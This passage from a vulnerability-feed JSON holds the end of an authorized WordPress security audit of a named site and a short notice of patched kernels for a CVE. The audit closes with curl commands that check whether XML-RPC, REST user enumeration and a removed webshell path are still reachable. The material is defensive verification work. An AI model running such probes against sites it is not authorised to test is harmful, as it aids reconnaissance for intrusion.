REST API users to authenticated users. Add HTTP security headers.\n\nThis month: Implement 2FA for the administration panel. Migrate DB credentials to Docker secrets. Configure DISABLE_WP_CRON and a real system cron. 
Implement a WAF in Cloudflare for xmlrpc.php and ?author=. Remove readme.html and set ServerTokens Prod.\n\nAppendix \u00b7 Post-remediation verification commands\n\nRun these commands after applying the fixes to confirm that the vectors are closed:\n\n# C-01: XML-RPC disabled\ncurl -s -X POST https://columtech.online/xmlrpc.php | grep -c \"XML-RPC server accepts\"\n# Expected: 0\n\n# C-02: Webshells removed\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/wp-loginizer.php\n# Expected: 404\n\n# H-03: REST users requires authentication\ncurl -s https://columtech.online/index.php?rest_route=/wp/v2/users | jq '.code'\n# Expected: \"rest_forbidden\"\n\n# H-03: ?author= does not reveal the user\ncurl -s -o /dev/null -w \"%{redirect_url}\" \"https://columtech.online/?author=1\"\n# Expected: empty or a URL without the user slug\n\n# L-01: HSTS present\ncurl -sI https://columtech.online/ | grep -i strict-transport\n# Expected: Strict-Transport-Security: max-age=...\n\n# L-03: readme.html removed\ncurl -o /dev/null -w \"%{http_code}\" https://columtech.online/readme.html\n# Expected: 404\n\nAudit performed by c4sh3r \u00b7 Report generated on 2026-06-04\nAll findings were verified in a real environment with the owner's authorization. The write tests (defacement, webshells) were cleaned up immediately after verification. Real PII redacted.", "creation_timestamp": "2026-06-03T23:46:41.000000Z"}, {"uuid": "2d5b62dc-0a13-44d5-9bac-409d578c0a79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-46333", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mnkyujhurn2z", "content": "Patched kernels for CVE-2026-46333 are now in production repos. 
\n\nA single dnf upgrade and reboot gets you patched kernels for ssh-keysign-pwn and Fragnesia \ud83d\udc49 https://almalinux.org/blog/2026-05-15-ssh-keysign-pwn-cve-2026-46333/?utm_medium=social&utm_source=bluesky", "creation_timestamp": "2026-06-05T20:43:06.219857Z"}]}